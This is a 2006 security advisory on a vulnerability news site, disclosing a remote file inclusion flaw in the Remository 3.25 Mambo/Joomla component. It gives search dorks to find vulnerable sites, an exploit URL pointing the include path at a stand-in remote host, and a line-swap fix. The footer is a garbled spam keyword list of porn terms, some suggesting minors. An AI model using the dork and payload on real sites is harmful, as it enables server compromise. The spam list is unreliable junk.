about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Mambo Remository Component <= 3.25 Remote Include Vulnerability




2006-08-10 Mambo Remository Component <= 3.25 Remote Include Vulnerability
Rated as : Moderate Risk
  .:[ insecurity research team ]:.
     .__..____.:.______.____.:.____ .
 .:. |  |/    \:/  ___// __ \:/   _\.:.
   : |  |   |  \\____\\  ___/\   /__ :. .
 ..: |__|___|  /____  >\___  >\___  >.:
   .:.. ..  .\/   .:\/:.  .\/.  .:\/:
 .   ...:.    .advisory.    .:...
         :..................: o9.o8.2oo6 ..
 
 
  Affected Application: Remository v3.25 

       (Mambo/Joomla CMS Component)
 
 
 . . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  Discoverd by: camino
 
  Team: Insecurity Research Team
 
  URL: http://www.insecurityresearch.org
 
  E-Mail: camino@sexmagnet.com
 
 
 
 . . :[ insecure application details ]: . . . . . . . . . . . . . . . . .
 
 
  Typ: Remote [x]  Local [ ]
 
       Remote File Inclusion [x]  SQL Injection [ ]
 
  Level: Low [ ]  Middle [x]  High [ ]
 
  Application: Remository
 
  Version: 3.25
 
  Vulnerable File: admin.remository.php
 
  URL: http://www.remository.com
 
  Description: It's a component that works with Mambo CMS 4.5+ to 

               provide a selection of files that users can download. 
 
  Dork: intext:"Remository 3.25. is technology by Black Sheep
Research"

        inurl:"com_remository"
 
 
 
 . . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  http://[sitepath]/[joomlapath]/administrator/components/

  com_remository/admin.remository.php?mosConfig_absolute_path=http://huh?
 
 
 
 . . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  o1.) open admin.remository.php
 
  o2.) take a look at line 16:

       require_once ($mosConfig_absolute_path.'/components/

       com_remository/com_remository_constants.php');
 
  o3.) take a look at line 19:

       defined( '_VALID_MOS' ) or die( 'Direct Access to this location 
 
       is not allowed.' );
 
  o4.) exchange line 19 with line 16!
 
 
 
 . . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  all the sexy members of insecurity research team ;-)
securitydot.net - 2006-08-10

Advertising

Copyright 2007, SecurityDot
Sat, 21 Nov 2009 00:16:51 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www/89com Www.xxxsex se.52avba. videos de Malayalamr blackgirls 1 union se exploits f mailer t88t Wwwsex.Co contentser school sex ls lolita MicrosoftT Arabiksex shemalbigc www.sdxinm php-nuke 2 sexyphotto XMB 1.9.11 sexyphotto pitchure www.wym86. charon www.zql.yn &amp;a Lank sex www.qc99.c www.nhmaa. sex13 farm Indianporn voman.com Vidio kawe Xobile news for c video 3gp news for c Wild Hogs nginx/0.5. 200 /compo www.bbcont news for c Xoop Sexes girl Vdio.SEXy. WWW.chatpe Galery ww.hi5.com ssh client